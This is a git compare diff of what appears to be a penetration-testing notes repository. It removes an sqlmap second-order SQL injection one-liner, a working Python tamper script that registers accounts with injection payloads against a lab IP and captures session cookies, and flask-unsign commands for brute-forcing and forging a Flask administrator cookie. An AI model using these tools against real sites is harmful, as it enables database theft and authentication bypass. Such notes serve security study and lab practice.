Compare commits
No commits in common. "ca53f6bcb98f62a3d7e11971bbf57dad8f7aaed2" and "2ea19b21c95e57489c29f330b356904f2eaefa01" have entirely different histories.
ca53f6bcb9
...
2ea19b21c9
|
|
@ -2,7 +2,6 @@
|
||||||
|
|
||||||
|
|
||||||
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
|
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
|
||||||
* [sqlmap usages](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
|
|
||||||
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
||||||
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
|
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
|
||||||
|
|
||||||
|
|
@ -32,22 +31,6 @@ sqlmap -u http://<target-IP>/site.php --forms --dump-all
|
||||||
|--tables|Show tables|
|
|--tables|Show tables|
|
||||||
|-T|Specify table|
|
|-T|Specify table|
|
||||||
|
|
||||||
### Advanced Features
|
|
||||||
|
|
||||||
#### Second Order SQL Injection
|
|
||||||
|
|
||||||
In case of an SQL injection where the result will be visible through another resource, use a second order injection. It is even possible to use a script in beforehand to login in and get a cookie, for example. A tutorial can be found on [Le Thanh Phuc's blog](https://lethanhphuc-pk.medium.com/second-order-sql-injection-explained-with-example-f67fb199f5e5)
|
|
||||||
|
|
||||||
|
|
||||||
An example oneliner including a tamper script and a first and second request captured in Burpsuite
|
|
||||||
```sh
|
|
||||||
sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py --second-req $(pwd)/second.req -p username --proxy http://127.0.0.1:8080 --technique=U --dbms mysql
|
|
||||||
```
|
|
||||||
The `second_order_tamper.py` can be found inside this repository. Users are created through this script by SQLmap to further login through `login.request` and read the output through `second.req` (delete the cookie from the header). The vulnerable POST parameter is `username`.
|
|
||||||
|
|
||||||
Dump the databases, tables afterwards
|
|
||||||
|
|
||||||
|
|
||||||
## Other Tools
|
## Other Tools
|
||||||
|
|
||||||
### Damn Small SQLi Scanner (DSSS)
|
### Damn Small SQLi Scanner (DSSS)
|
||||||
|
|
|
||||||
|
|
@ -1,74 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
'''
|
|
||||||
The following line is an example on how to utilize the script
|
|
||||||
sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py \
|
|
||||||
--second-req $(pwd)/second.req -p username --technique=U --dbms mysql
|
|
||||||
'''
|
|
||||||
|
|
||||||
import re
|
|
||||||
import requests
|
|
||||||
from lib.core.enums import PRIORITY # Imported by SQLmap
|
|
||||||
__priority__ = PRIORITY.NORMAL
|
|
||||||
|
|
||||||
|
|
||||||
def dependencies():
|
|
||||||
'''
|
|
||||||
define dependencies
|
|
||||||
'''
|
|
||||||
pass
|
|
||||||
|
|
||||||
|
|
||||||
URL = "http://10.10.212.150:8000"
|
|
||||||
|
|
||||||
|
|
||||||
def login_account(payload):
|
|
||||||
'''
|
|
||||||
Create account and return the cookie
|
|
||||||
The SQLi is in the username field
|
|
||||||
'''
|
|
||||||
proxies = {'http': 'http://127.0.0.1:8080'}
|
|
||||||
#cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
|
|
||||||
|
|
||||||
params = {
|
|
||||||
"username": payload, # random.randint(100000, 99999999), # SQLi field
|
|
||||||
"email": "admin@admin.com",
|
|
||||||
"password": "password123" # Needs to be similar to '-r req.txt'
|
|
||||||
}
|
|
||||||
url = f"{URL}/register"
|
|
||||||
_ = requests.post(
|
|
||||||
url, data=params, timeout=10, # cookies=cookies,
|
|
||||||
verify=False, allow_redirects=True, proxies=proxies
|
|
||||||
)
|
|
||||||
|
|
||||||
url = f"{URL}/login"
|
|
||||||
response = requests.post(
|
|
||||||
url, timeout=10, data=params, # cookies=flask_cookie,
|
|
||||||
verify=False, allow_redirects=True, proxies=proxies
|
|
||||||
)
|
|
||||||
|
|
||||||
#print(response.headers)
|
|
||||||
flask_cookie = re.search(
|
|
||||||
'session=(.*?);', response.headers['Set-Cookie']).group(1)
|
|
||||||
|
|
||||||
# url = f"{URL}/logout"
|
|
||||||
# response = requests.post(
|
|
||||||
# url, timeout=10, cookies=flask_cookie,
|
|
||||||
# verify=False, allow_redirects=True, proxies=proxies
|
|
||||||
# )
|
|
||||||
|
|
||||||
return f"session={flask_cookie}"
|
|
||||||
|
|
||||||
|
|
||||||
def tamper(payload, **kwargs):
|
|
||||||
'''
|
|
||||||
The function used by SQLmap
|
|
||||||
'''
|
|
||||||
headers = kwargs.get("headers", {})
|
|
||||||
headers["Cookie"] = login_account(payload)
|
|
||||||
# login_account(payload)
|
|
||||||
return payload
|
|
||||||
|
|
||||||
|
|
||||||
#if __name__ == "__main__":
|
|
||||||
# login_account("yo")
|
|
||||||
|
|
@ -1,25 +0,0 @@
|
||||||
# Flask Cookies
|
|
||||||
|
|
||||||
They have their own structure, similar to JWT. The cookie can be decoded and encoded with and sometimes without a key.
|
|
||||||
Cookies are not encrypted but signed, so the key for the siging can sometimes be bruteforces or can be found via a wordlist.
|
|
||||||
|
|
||||||
## Read Flask Cookie
|
|
||||||
|
|
||||||
Using `flask-unsign` this can be done via
|
|
||||||
```sh
|
|
||||||
flask-unsign --decode --cookie '<COOKIE>'
|
|
||||||
```
|
|
||||||
|
|
||||||
## Unsign the Flask Cookie
|
|
||||||
|
|
||||||
Unsigning the cookie can be done in the following way
|
|
||||||
```sh
|
|
||||||
flask-unsign --wordlist $WORDLIST --unsign --cookie '<COOKIE>' --no-literal-eval
|
|
||||||
```
|
|
||||||
|
|
||||||
## Sign the Flask Cookie
|
|
||||||
|
|
||||||
Siging the cookie can be done via
|
|
||||||
```sh
|
|
||||||
flask-unsign --sign --cookie "{'id':0,'loggedin':True,'username':'administrator'}" --secret '<Secret>'
|
|
||||||
```
|
|
||||||
Loading…
Reference in New Issue